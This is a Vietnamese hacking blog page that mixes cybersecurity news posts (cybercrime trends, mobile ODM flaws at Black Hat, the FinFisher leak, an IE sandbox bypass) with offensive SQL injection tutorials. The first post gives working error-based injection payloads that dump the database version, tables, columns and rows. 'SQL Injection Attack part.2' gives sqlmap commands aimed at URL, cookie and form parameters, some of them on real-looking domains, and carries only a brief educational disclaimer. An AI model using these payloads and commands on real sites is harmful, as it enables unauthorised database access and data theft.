Keyz Cenly Blog

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

<div dir="ltr" style="text-align: left;" trbidi="on">
Ví dụ victim có dạng: http://target.com/page.php?id = 1 Lệnh get version, database http://target.com/page.php?id = 1 [color=#ffffffff]And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)[/color] Tương tự vậy, lệnh get table: And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),1,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a) Bạn để ý chỗ 1,145…Tăng số 1 đó thành một số lớn hơn (thường là số ký tự được trả ra trong dấu ngoặc kép sau phần duplicate entrie….) And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),63,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a) Tiếp theo, lấy column của một table nào đó And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name),1,145) FROM information_schema.columns where table_schema=database() and table_name=0xso_hex_cua_tablename) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a) Tăng số 1 theo nguyên tắc như trên. Và cuối cùng là dữ liệu: And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name_1,0x7c,column_name_2),1,145) FROM table_name_nao_do) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a) CEH</div>

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

Ví dụ victim có dạng: http://target.com/page.php?id = 1 Lệnh get version, database http://target.com/page.php?id = 1 [color=#ffffffff]And (...

Vì sao tội phạm mạng ngày càng nguy hiểm

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZ06B3NaG8l0js_bO-2DzoZ1v3YL6KWmcbisjah5Pf8hs1ecMLQpg2S93cyTuKauJtasKr-YD5EEPi4kIb6keRnkiIo3NVdt8D_Tb85LBssncF9hMZwrke1Zka2nQPn5hpj0WkzICDDfY/s1600/hacker-trung-quoc.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="482" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSZ06B3NaG8l0js_bO-2DzoZ1v3YL6KWmcbisjah5Pf8hs1ecMLQpg2S93cyTuKauJtasKr-YD5EEPi4kIb6keRnkiIo3NVdt8D_Tb85LBssncF9hMZwrke1Zka2nQPn5hpj0WkzICDDfY/s1600/hacker-trung-quoc.jpg" width="640" /></a></div>
 Dù người dùng Internet ngày càng thông minh, các công cụ bảo vệ ngày càng tốt hơn, nhưng tội phạm mạng đang trở nên nguy hiểm hơn bao giờ hết. Cuộc chiến chống tội phạm Internet ngày nay đã thay đổi rất nhiều so với những ngày đầu của hàng chục năm về trước. Hiện tại, lượng phần mềm độc hại đã lên đến con số hàng trăm, hàng triệu ứng dụng. Không chỉ vậy, thế giới còn có đến hàng ngàn tổ chức tin tặc chuyên nghiệp. Và theo ước tính, người dùng Internet mất hàng trăm triệu USD mỗi năm. Vậy, đâu là lý do chính dẫn đến việc bành trướng và ngày càng trở nên nguy hiểm của tội phạm mạng ngày nay? Trước hết, phải nói đến việc tội phạm mạng hầu như rất ít khi bị truy cứu hay bắt giữ. Thế giới Internet ngày nay cũng chẳng mấy khác biệt với đời thường, cũng tồn tại đầy rẫy những kẻ xấu song song với người tốt. Những tội phạm mạng không phạm sai lầm hay thực hiện những việc làm xấu xa một cách trắng trợn có thể chẳng bao giờ bị “sờ gáy”. Quan niệm sai lầm lớn nhất hiện nay chính là các hacker đều là những người rất thông minh. Thực tế cho thấy, tội phạm mạng đa phần đều là những người thiếu đạo đức và có khi chẳng thể nào lập trình một ứng dụng đơn giản. Chúng đơn giản chỉ cả gan mua các phần mềm độc hại từ những người lập trình thông minh khác nhằm thực hiện mưu đồ xấu trên Internet của mình. Chính từ nhận thức sai lầm này mà tội phạm mạng ngày càng gia tăng, vì có thể làm giàu mà chẳng lo nguy cơ bị bắt. Không chỉ vậy, hầu hết các hoạt động của tội phạm mạng đều diễn ra bên ngoài biên giới quốc tế. Trong khi các cơ quan thực thi pháp luật vẫn luôn có một ranh giới pháp lý nhất định, nhưng suy cho cùng, họ vẫn bị hạn chế bởi ranh giới quốc tế giữa các nước với nhau. Nếu muốn bắt giữ một tội phạm với bằng chứng pháp lý rõ ràng về hành động phạm tội tại nước ngoài, cơ quan chức năng trước hết phải gửi yêu cầu đến chính quyền sở tại. Tuy nhiên, những yêu cầu này vẫn có thể bị chính quốc gia đó bác bỏ. Cũng có trường hợp kết hợp các cơ quan thực thi pháp luật giữa 2 quốc gia khác nhau, song trường hợp này rất hiếm. Và một sự thật thế giới tội phạm mạng biết rõ là, chính quyền các quốc gia lớn như Mỹ, Nga và Trung Quốc sẽ chẳng bao giờ ngồi lại hợp tác với nhau. Bên cạnh những hạn chế kể trên, một trở ngại lớn đối với cơ quan thực thi chức năng đáng phải kể đến nữa chính là sự thiếu hụt chứng cứ. Trong hầu hết các hệ thống máy tính và mạng, rất ít những bằng chứng được tìm thấy đủ để thành lập một phiên tòa. Dù vậy, ngay cả khi những bằng chứng phạm tội được thu thập, chúng vẫn có thể không được chấp nhận bởi các luật sư. Hiện tại, rất ít tổ chức có chuyên môn trong việc tìm kiếm thu thập bằng chứng phạm tội trên môi trường Internet. Ngoài ra, nguồn lực giúp theo đuổi những tên tội phạm Internet ngày nay vẫn còn rất hạn chế. Và số lượng tội phạm mạng làm tổn thương nền kinh tế vẫn chưa đáng để các cơ quan chức năng nâng mức báo động lên cấp toàn cầu. Thực tế là tội phạm mạng có thể gây mất mát hàng trăm triệu hay thậm chí cả tỷ USD mỗi năm, nhưng những hành vi phạm pháp, gây thiệt hại như vậy đã có từ lâu, trước khi có Internet. Vậy, có chăng giải pháp kìm hãm sự bành trướng và nguy hiểm của tội phạm mạng ngày nay? Câu trả lời là có. Chúng ta có đầy đủ các phương tiện, công nghệ để làm điều này trong suốt một thời gian dài mà không cần phải chờ đợi một công nghệ mới, tốt hơn. Mọi thứ đều có sẵn, ngoại trừ sự đồng thuận toàn cầu. Thiết nghĩ, nếu không sớm loại bỏ những nhận thức đầy tính thụ động về tội phạm mạng thế giới sẽ phải đối mặt với một thảm họa Internet lớn trong tương lai. Theo PCWorld</div>

Vì sao tội phạm mạng ngày càng nguy hiểm

Dù người dùng Internet ngày càng thông minh, các công cụ bảo vệ ngày càng tốt hơn, nhưng tội phạm mạng đang trở nên nguy hiểm hơn bao giờ...

Black Hat: Gần 2 tỉ thiết bị di động trên thế giới tồn tại lỗ hổng bảo mật

<div dir="ltr" style="text-align: left;" trbidi="on">
 Một hệ thống điều khiển từ xa đã được cài đặt lên hầu hết smartphone mà hacker có thể tận dụng để chiếm quyền điều khiển trên rất nhiều thiết bị, cho phép chúng đánh cắp hoặc nghe lén dữ liệu, các cuộc gọi của người sử dụng mà họ không hề hay biết. Mathew Solnik, một nhà nghiên cứu thuộc Accuvant đại diện nhóm nghiên cứu đã trình bày tại hội thảo Black Hat vừa qua. <img src="https://blogger.googleusercontent.com/img/proxy/AVvXsEhfSKb-F0oYehb1LM6c0-0_Jac-b-d6MzDsSagFEvlHuN_9uNUXrSJsNu25xeQpPNRss8BTx2O-62hy8i5L6UC-mwvCe1PNNQrh122k-MoHawAFxme5wHioIOvt9rPKdY8ITGreXnLdGbNttW5HC-0r1EpCU-Ag4B6Y3C5U-aKAQptCpHsKBgOaAeQhnWP7epc=" /> Các nhà cung cấp dịch vụ mạng không dây (Wireless carriers) đã cài đặt cơ chế này (giao thức ODM) trên điện thoại, máy tính bảng và thậm chí trên ô tô như một cách để cập nhật phần mềm và thay đổi cài đặt các cài đặt của hệ thống. Các nhà nghiên cứu bảo mật tại công ty Accuvant đã hé lộ hàng loạt lỗ hổng mà có thể bị lợi dụng cho phép điều khiển thiết bị từ xa. Trong bài test của mình, Accuvant có thể chiếm quyền điều khiển thiết bị Apple và những hãng khác. Họ có thể cài đặt bất cứ phần mềm nào lên thiết bị và cho phép chúng đánh cắp dữ liệu nhạy cảm của người dùng. “Kẻ tấn công có toàn quyền điều khiển thiết bị” Mathew Solnik, một nhà nghiên cứu thuộc Accuvant đại diện nhóm nghiên cứu đã phát biểu tại hội thảo Black Hat vừa qua. Cuộc tấn công cũng có thể được dùng để cài đặt lại thiết bị. Ví dụ, nó sẽ chuyển hướng toàn bộ dữ liệu đến một máy chủ độc hại nhằm thu thập các thông tin kết nối của hệ thống. Rất nhiều cài đặt đã được thiết kế sẵn trong “baseband” của máy và không thể thêm bớt cũng như xóa chúng. “Nếu bạn khôi phục cài đặt gốc cũng chẳng thể loại bỏ được chúng” – Solnik phát biểu. Ước tính gần 2 tỉ thiết bị di động trên thế giới đang sử dụng giao thức ODM này để kết nối với nhà sản xuất. Một số nơi 70% đến 90% những thiết bị này được trang bị các phần mềm được thiết kế với các chức năng điều khiển từ xa – theo nghiên cứu từ trường đại học Massachusetts. Mặc dù đây là một vấn đề quan trọng, nhưng chúng vẫn chưa được cập nhật kể từ năm 2004. Các nhà nghiên cứu đã thực hiện một cuộc tấn công sử dụng lỗ hổng tìm thấy trong phần mềm, cũng như trong phần thiết kể giao thức ODM của các nhà sản xuất để chiếm quyền kiểm soát hệ thống. Các thiết bị Android được xem lại dễ bị ảnh hưởng nhất. Các nhà nghiên cứu chỉ có thể chiếm quyền điều khiển thiết bị Apple trong mạng Sprint. Những thiết bị unlocked được mua trực tiếp từ nhà sản xuất là bảo mật nhất bởi vì hầu hết chúng không được cài đặt các phần mềm theo giao thức ODM. Solnik cho rằng các cuộc tấn công thông qua giao thức ODM sẽ vẫn tồn tại ngay cả khi có những bản vá lỗi được đưa ra. Lỗ hổng tìm thấy trong giao thức kết nối phần mềm gốc trên thiết bị không thể sửa được cho đến khi ngành công nghiệp này đồng ý thiết kế lại một mẫu thiết kế mới. Vấn đề này cũng có thể liên quan đến các cơ quan tình báo, các cơ quan thực thi pháp luật khi mà việc sử dụng malware để thu thập dữ liệu đang rất phổ biến hiện nay, rất có thể nó đã được khai thác từ rất lâu mà chúng ta không biết. Khi mà việc sử dụng các phần mềm này có thể can thiệp vào tin nhắn, cuộc gọi và dữ liệu gửi bởi điện thoại khác. Đây có thể là công nghệ được dùng làm nền tảng cho nhiều cuộc tấn công khác, như việc bí mật cài đặt các phần mềm độc hại khác lên các điện thoại khác.</div>

Black Hat: Gần 2 tỉ thiết bị di động trên thế giới tồn tại lỗ hổng bảo mật

Một hệ thống điều khiển từ xa đã được cài đặt lên hầu hết smartphone mà hacker có thể tận dụng để chiếm quyền điều khiển trên rất nhiều thi...

Phần mềm gián điệp FinFisher bị rò rỉ 40GB dữ liệu

<div dir="ltr" style="text-align: left;" trbidi="on">
 FinFisher – Một phần mềm gián điệp được các cơ quan chính phủ và pháp luật sử dụng nhằm mục đích giám sát đã bị tấn công và rò rỉ một chuỗi các tập tin, tại liệu về dự án FinFisher trên Internet. Phần mềm giám sát bí mật này là FinFisher được bán bởi công ty Anh Gamma International có thể bí mật theo dõi các máy tính như theo dõi webcam, ghi lại tất cả hoạt độngcủa người dùng với một keylogger, ngăn chặn các cuộc gọi Skype, sao chép tập tin và nhiều tính năng khác nữa. Một hacker đã tuyên bố trên Reddit và Twitter rằng hắn đã thâm nhập vào mạng lưới của một trong những công ty giám sát và công nghệ trên thế giới là Gamma International– tác giả của phần mềm gián điệp FinFisher và hơn 40GB dữ liệu nội bộ và chi tiết các hoạt động, hiệu quả của bộ công cụ FinFisher đã bị rò rỉ ra ngoài. Những thông tin bị rò rỉ được công khai trên cả một tài khoản parody Gamma Group Twitter (GammaGroupPR) và Reditt của các hacker. Chúng bắt đầu công khai những liên kết đến các tài liệu và các tweets châm biếm. Các tập tin bị rò rỉ bao gồm các danh sách khách hàng, danh sách giá cả, mã nguồn của web Finfly, chi tiết về hiệu quả của Finfisher, người sử dụng và hỗ trợ tài liệu, danh sách các lớp/ hướng dẫn, và nhiều thông tin quan trọng hơn nữa.Các tập tin FinFisher đầu tiên đã bị rò rỉ trên Dropbox như một tập tin torrent và khi được chia sẻ trên internet, không thể ngăn chặn các thông tin đó. FinFisher bị phát hiện trên bởi Skype sử dụng trên OS X, vì vậy người sử dụng Skype trên OS X sẽ được cảnh báo về sự hiện diện của phần mềm gián điệp FinFisher này bằng một thông báo rằng một mô-đun ghi âm đã được cài đặt. <img src="https://blogger.googleusercontent.com/img/proxy/AVvXsEgX4VTDURiTLE7jKkLC6W_O2yuk6npB3BxzuJHFQ2KoA1b2TVwTqcbGCGE5poV2PP_cscIGaWRiQq-kmZsUhjpRbd3dkFZNZ3vYBC90ysjrvkXOeZHKN6chE6t7SykrxM4jr9VoxKXrlva0AelvVXTMZoR5ON9LTaJxGZi0E5aWcUP6=" /> FinFisher không thể khai thác người dùng Windows 8, vì vậy người dùng nên lựa chọn phiên bản Metro của Skype. Theo THN</div>

Phần mềm gián điệp FinFisher bị rò rỉ 40GB dữ liệu

FinFisher – Một phần mềm gián điệp được các cơ quan chính phủ và pháp luật sử dụng nhằm mục đích giám sát đã bị tấn công và rò rỉ một chuỗi...

Nhóm hacker Anonymous đánh sập trang web của Cơ quan tình báo Israel

<div dir="ltr" style="text-align: left;" trbidi="on">
 
<div dir="ltr" style="text-align: left;" trbidi="on">
Nhóm hacker Anonymous thông báo đã đánh sập trang web chính thức của lực lượng tình báo Israel (Mossad) nhằm chống lại lực lượng quân đội nước này đã gây ra hàng trăm vụ thiệt mạng cho dân thường tại dải Gaza. Chính phủ Israel hiện chưa đưa ra bất kỳ bình luận nào về vụ tấn công này. 
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMe7JvQcxUtCFlGXwEH-s5lcVOUroTMpABpefq5xDkKVr82QKdAwM1rTtEtXYiFndaTg_WNQWM6jBeYctuWaSV_Fbbm6gZD9A4Gc87tiVmW4QJ6xQquxPvM2I1Ho_uOEppcf-0DO-Huha9/s1600/Anonymous-Gaza-700x432.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="394" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMe7JvQcxUtCFlGXwEH-s5lcVOUroTMpABpefq5xDkKVr82QKdAwM1rTtEtXYiFndaTg_WNQWM6jBeYctuWaSV_Fbbm6gZD9A4Gc87tiVmW4QJ6xQquxPvM2I1Ho_uOEppcf-0DO-Huha9/s1600/Anonymous-Gaza-700x432.jpg" width="640"></a></div>
</div>

Nhóm hacker Anonymous đánh sập trang web của Cơ quan tình báo Israel

Nhóm hacker Anonymous thông báo đã đánh sập trang web chính thức của lực lượng tình báo Israel (Mossad) nhằm chống lại lực lượng quân đội...

Sandbox của IE vẫn bị phá vỡ

<div dir="ltr" style="text-align: left;" trbidi="on">
 Sau hơn 4 năm phát triển, sandbox của IE nhằm chống lại các cuộc tấn công độc hại dựa trên nền tảng web bởi các mã khai thác cách mà thường được sử dụng trong các cuộc tấn công “Watering Hole” vẫn dễ dàng bị vượt qua. Có một cách rất đơn giản để khai thác IE và dễ dàng qua mặt sandbox trong hầu hết các phiên bản của Internet Explorer. Microsoft đã thông báo rằng họ chưa có kế hoạch nào để vá lỗ hổng này. Cơ chế lợi dụng của lỗ hổng đã được đưa ra trong một blog vào thứ năm vừa qua kèm theo các gợi ý vô cùng dễ dàng cho các mã độc xâm nhập vào máy tính của người dùng. Sandbox được tích hợp sẵn trong IE và Google Chrome, rất hiệu quả để chống lại các phần mềm độc hại. Các phần mềm độc hại thường khai thác bằng 2 cách, một là xuyên thủng sandbox và hai là nhắm tới các lỗ hổng trong phần xử lý của trình duyệt. “Cơ chế xâm nhập này khiến kẻ tấn công có rất nhiều điều khiện thuận lợi để khai thác người dùng, cho phép hacker có quyền truy cập sâu hơn vào hệ thống, cao hơn mức bình thường trong IE hoặc vượt qua được cơ chế SandBox trong IE” theo Robert “Rsnake” Hansen, phó chủ tịch công ty bảo mật WhiteHat Labs. Được biết đến với tính năng “Protect Mode”, các trang web mà bạn truy cập đều được chạy trong môi trường Sandbox. Quyền truy cập của trang web này đối với chương trình khác sẽ bị hạn chế và chỉ được chạy trong trình duyệt cũng như chỉ được can thiệp vào một phần nhỏ tài nguyên hệ thống. Những cuộc tấn công chỉ có thể khai thác để tạo ra các cuộc tấn công từ chối dịch vụ hay cài đặt những đoạn mã độc để tự động gửi tin rác. Thông thường thì chúng khó có thể tồn tại và lấy được nhiều quyền truy cập đối với hệ thống nó nhắm tới. Theo nghiên cứu của HP, tìm ra một cách dễ dàng để biến những mã tấn công thành những tiến trình có “mức độ tin cậy trung bình” được cấp cho người dùng Windows. Phương pháp tấn công trên được chứng minh lần đầu tiên bởi các nhà nghiên cứu đến từ Verizon năm 2010, khi mà IE 7 đang được ưa chuộng để sử dụng. Các nhà nghiên cứu của công ty HP cũng đóng góp một phần khi đưa ra những bằng chứng về sự tồn tại của lỗ hổng. Phương pháp tấn công bao gồm việc thiết lập một trang web giả mạo thực hiện những công việc đáng tin cậy và khai thác lỗ hổng tại địa chỉ localhost của máy tính vốn được sử dụng để giao tiếp với những dịch vụ trong hệ thống. Bằng cách này, mã độc được thực thi với “mức độ tin cậy trung bình” và không phải đi qua sandbox. Cách tấn công này hoạt động trên hầu hết các trình duyệt IE trừ IE 11 trên Windows 8.1 do có tính năng Enhanced Protected Mode. Mặc định, tính năng bảo vệ Enhanced Protected Mode chống lại các xâm nhập được kích hoạt sẵn khi người dùng khởi chạy Internet Explorer 10 và 11 ở giao diện Modern UI. Nhưng với giao diện Desktop Mode, bạn sẽ phải tự mình kích hoạt tính năng này. Microsoft không cho rằng đó là lỗ hổng bảo mật đối với tính năng Protected Mode. Protected Mode là một tínhnăng bảo vệ tích hợp sâu được giới thiệu từ Internet Explorer 7 năm 2006 và được phát triển thành Enhanced Protected Mode năm 2012. Enhanced Protected Mode là một tính năng mới trong Internet Explorer 11, chạy trên Windows 8.1, hoàn toàn xử lý được vấn đề trên. Phương pháp tấn công này không thể dùng để làm hại khả năng bảo mật của người dùng. Một vài nghiên cứu khác HD Moore, trưởng nhóm nghiên cứu tại Rapid7 cho rằng những nhà quản trị mạng nên chịu trách nhiệm trong việc hướng người dùng đến những trình duyệt web bảo mật hơn như Chrome, và tìm kiếm một cách thức bảo vệ sandbox khác cho những ai buộc phải dùng Internet Explorer. Những phần mềm sandbox của bên thứ 3 như Sandboxie và Invincea là những ứng cử viên sang giá. “Kích hoạt những tiến trình có “mức độ tin cậy trung bình” là một vấn đề rất nghiêm trọng trong 4 vấn đề chính gặp phải của Internet Explorer. Bạn không cần thiết phải yêu cầu một API (giao diện lập trình ứng dụng) để bảo vệ hay phải đối mặt với những lỗ hổng bảo mật này. Đơn giản hãy chuyển qua những cách khác liên quan đến JavaScript, Page reload …vv nhà nghiên cứu công ty HP cho biết.</div>

Sandbox của IE vẫn bị phá vỡ

Sau hơn 4 năm phát triển, sandbox của IE nhằm chống lại các cuộc tấn công độc hại dựa trên nền tảng web bởi các mã khai thác cách mà thường...

SQL Injection Attack part.3 (End)

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7pYrSeZMo9BGuRqxEVQ2Gnhr0Mqap3NhoXXWlHZ3YSDMdcnBaPS9Ser6xJs20R0hOmFxfLCipzxPKan5JsocjcZ1_jYx8i-Yx1SLxalcyGgLO6dtH1rQD_6ff6McuoAZ8jTlgR2qaHlo3/s1600/kd_sqlia_classification_2010.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7pYrSeZMo9BGuRqxEVQ2Gnhr0Mqap3NhoXXWlHZ3YSDMdcnBaPS9Ser6xJs20R0hOmFxfLCipzxPKan5JsocjcZ1_jYx8i-Yx1SLxalcyGgLO6dtH1rQD_6ff6McuoAZ8jTlgR2qaHlo3/s1600/kd_sqlia_classification_2010.png" width="466" /></a></div>
Đọc Thêm: 
- <a href="http://keyzcenly.blogspot.com/2014/07/sql-injection-attack-part1.html" target="_blank">SQL Injection Attack part.1</a> 
- <a href="http://keyzcenly.blogspot.com/2014/07/sql-injection-attack-part2.html" target="_blank">SQL Injection Attack part.2</a></div>

SQL Injection Attack part.3 (End)

Đọc Thêm: - SQL Injection Attack part.1 - SQL Injection Attack part.2

SQL Injection Attack part.2

<div dir="ltr" style="text-align: left;" trbidi="on">
<h2>
PHẦN 2: NƠI MÀ BẠN QUYẾT ĐỊNH ĐỂ XÂM NHẬP LÀ…?</h2>

10 điều “cần” và “phải” biết đã đề cập trong phần 1: 

<blockquote>
Identifying injectable parameters - Performing database finger-printing - Determining database - Extracting data - Adding or modifying data - Performing denial of service - Evading detection - Bypassing authentication - Executing remote - Performing privilege escalation</blockquote>

<a href="https://securityforall.wordpress.com/2012/07/19/sql-injection-la-gi/" target="_blank">https://securityforall.wordpress.com/2012/07/19/sql-injection-la-gi/</a> (Phần 1) 

Trong phần 2 này, mình sẽ chỉ tập trung vào việc “Identifying injectable parameters” (nghĩa là: Xác định tham số có thể chèn SQL Injection) từ cơ bản đến hơi hơi nâng cao. 

1.URL 

2. HTTP Header 

3. Cookie 

4. Forms (HTTP body) 

<h2>
1.URL</h2>

<a href="http://victim.com.vn/index.php?option=com_content&view=category&layout=blog&id=12" rel="nofollow">http://victim.com.vn/index.php?option=com_content&view=category&layout=blog&id=12</a> 

Phân tích: Đây là website có CMS là Joomla (chúng ta sẽ ưu tiên những tham số có giá trị dạng number, ở đây ta có id=12) 

<div style="text-align: left;">
<a href="http://victim.com.vn/index.php" rel="nofollow">http://victim.com.vn/index.php</a></div>

<div style="text-align: left;">
?option=com_content <———- có thể ở đây bị lỗ hổng chăng?</div>

<div style="text-align: left;">
&view=category <———- có thể ở đây bị lỗ hổng chăng?</div>

<div style="text-align: left;">
&layout=blog <———- có thể ở đây bị lỗ hổng chăng?</div>

<div style="text-align: left;">
&id=12 <———- có thể ở đây bị lỗ hổng chăng?</div>

Sau khi mình thêm ký tự ‘ vào sau id=12 thì xuất hiện: 

Warning: Invalid argument supplied for yyy() in /var/www/xxxxxxxxxxxxx/galery.php on line 22 

Dòng chữ có màu này là thông tin đã bị thay đổi để bảo đảm an toàn cho server <img alt=":D" src="https://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /> 

Vậy ta chắc chắc một điều rằng: parameter id là nơi có thể chèn lệnh SQL vào. Nếu bạn không chuyên nghiệp hay mù tịt về  SQL Query thì dùng SQLMAP nào. 

(Mánh: các parameter thường thấy trong việc khai thác là id cid gid videoid viewid v.v… (vì những tham số này sẽ là các truy vấn vào database) hoặc các bạn google với keyword : dork sql injection) 

<blockquote>
sqlmap.py -u “http://victim.com.vn/index.php?option=com_content&view=category&layout=blog&id=12″ -p id -v 3 –dbs</blockquote>

<img alt="" class="aligncenter" height="68" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/url.jpg" width="620" /> 

-p id | là chỉ rõ ra paremeter có thể tấn công 

-v 3 | hiện thông tin truy vấn ra màn hình 

–dbs | dò tìm những database trên server 

Khi khai thác thành công, kết quả có dạng như hình sau 

<img alt="" class="aligncenter" height="249" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/dbs2-1.jpg" width="620" /> 

<h2>
2.HTTP Header</h2>

Ở phần này, chúng ta sẽ cần đi sâu hơn vào giao thức HTTP. Để 
thấy những thông tin mình sắp giới thiệu bên dưới, Các bạn nên dùng 
Wireshark để bắt gói tin. 

GET / HTTP/1.1 
Connection: Keep-Alive 
Keep-Alive: 300 
Accept:*/* 
Host: <a href="http://www.minhtamnw.com/" rel="nofollow">http://www.minhtamnw.com</a>
X_FORWARDED_FOR :111.222.333.444 <——— Có thể chèn SQL Injection ở đây
Referer: <a href="http://www.minhtamnw.com/index.php%C2%A0" rel="nofollow">http://www.minhtamnw.com/index.php </a><——— Có thể chèn SQL Injection ở đây 
Accept-Language: en-us 
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;  rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 ( .NET CLR 3.5.30729; .NET4.0E) <——— Có thể chèn SQL Injection ở đây
Cookie: guest_id=v1%3A1328019064; pid=v1%3A1328839311134 <——— Có thể chèn SQL Injection ở đây (chúng ta sẽ bàn luận ở phần sau) 

<img alt="" class="aligncenter" height="83" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/user-agent.jpg" width="620" />  
 

<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLGM1LmpOciVBENFNcRoRdkEnoNmbC08Zb_8pfiolgGSaU-XEqgcQodjQYcSY2ek4G3n94eKFbgUWSpt6Iy44kAwz0Hu-9MpqSRGPNQjAVa_ncNe2TRmtj8-JNDdL_WMKFUYDqRXbhrQ41/s1600/user-agent2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLGM1LmpOciVBENFNcRoRdkEnoNmbC08Zb_8pfiolgGSaU-XEqgcQodjQYcSY2ek4G3n94eKFbgUWSpt6Iy44kAwz0Hu-9MpqSRGPNQjAVa_ncNe2TRmtj8-JNDdL_WMKFUYDqRXbhrQ41/s1600/user-agent2.jpg" width="640" /></a></div>
 

<h2>
3. Cookie</h2>

<img alt="" class="aligncenter" height="214" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/030612_0226_Cookiebased1.jpg" width="601" /> 

Bạn có bao giờ đăng nhập vào một website nào đó | tắt modem | mở lại 
modem (IP Public đã thay đổi)| Khi có mạng trở lại, bạn vẫn vào website 
đó mà không cần gõ user/password để đăng nhập nữa. 

Chính cookie đã lưu thông tin về phiên làm việc của bạn tại máy tính 
cá nhân.| Đây là một trong các ứng dụng của cookie trong giao thức HTTP.
 Trong bài viết này, tôi không bàn nhiều về cookie là gì, mà chúng ta sẽ
 chuyển qua giai đoạn khai thác. 

<img alt="" class="aligncenter" height="397" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/cookie2.jpg" width="600" /> 

sqlmap.py -u “http://quantrimang.com.vn” –cookie=ASP.NET_SessionId=gxrxx4ejl202n2viyvebbx45 -p ASP.NET_SessionId –level 3 -v 4 

<img alt="" class="aligncenter" height="139" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/cookie22.jpg" width="620" /> 

Ngoài ra, các bạn có thể dùng add-on<a href="https://addons.mozilla.org/vi/firefox/addon/live-http-headers/" target="_blank"> Live HTTP headers</a> dùng trên Firefox để carpture các header của gói tin. 

<h2>
4.FORMS (HTTP BODY)</h2>

<a href="https://minhtamnw.files.wordpress.com/2012/05/cookie.jpg" target="_blank"> 
</a>Một cách dễ hiểu hơn là chúng ta sẽ chèn truy vấn vào nội dung của gói tin, ví dụ hình sau: 

<img alt="" class="aligncenter" height="119" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/forms1.jpg" width="500" /> 

một trang web có thể có rất nhìu form bao gồm thấy được và không thấy được và chúng ta sẽ chèn những truy vấn vào những ô này. 

một vài thông tin: giao thức HTTP khi gởi dữ liệu từ phía client lên 
server sẽ dùng phương thức POST. Vì vậy trước khi tấn công loại này, 
chúng ta cần biết một trang web sẽ gởi đi những gì sau khi chúng ta nhấn
 nút “Đăng nhập”. Chúng ta vẫn sẽ dùng Live HTTP headers để phân tích 

<img alt="" class="aligncenter" height="239" src="https://i0.wp.com/i1095.photobucket.com/albums/i463/aptx4869w/post1.jpg" width="620" /> 

Với dạng này, ta sẽ dùng sqlmap khai thác như sau: 

<blockquote>
sqlmap.py -u “http://www.victim.com.vn/index.php” –data “user_id=injectionhere&password=injectionhere&button=%C4%90%C4%83ng+nh%E1%BA%ADp” -p user_id,password –level 3 -v 3 –dbs</blockquote>

tham số –data “dữ liệu vào” : tại đây chúng ta chỉ định dữ liệu và 
phụ thuộc vào tên của form, ví dụ ta có form user_id và password thì cả 2
 phải được điền vào như là một gói tin đầy đủ,(tránh bị server reject do
 không đủ dữ liệu) 

-p user_id,password : tiến hành kiểm tra trên 2 tham số chỉ định 

~~~~~~~~~~~~~~~~~~~~~~~ 
 

còn tiếp…</div>

SQL Injection Attack part.2

PHẦN 2: NƠI MÀ BẠN QUYẾT ĐỊNH ĐỂ XÂM NHẬP LÀ…? 10 điều “cần” và “phải” biết đã đề cập trong phần 1: Identifying injectable parameters...

SQL Injection Attack part.1

<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<blockquote>
<blockquote class="tr_bq">
<h4 style="text-align: left;">
Bạn chuẩn bị đọc một loại lỗ hổng nguy hiểm bậc nhất thế giới!</h4>
 | có hơn 9.680.000 kết quả do google trả về với từ khóa “SQL Injection” | 
 | vì vậy mình sẽ không đi sâu vào cơ chế hay giới thiệu nó là gì? | 
 | đây là những kinh nghiệm cũng như công cụ để khai thác | 
 | và quan trọng là vì mục đích giáo dục | 
 |không dùng để xâm nhập và phá server vì mục đích mũ đen hay mang tính thương mại| 
 ———————————</blockquote>
</blockquote>
 
<ul>
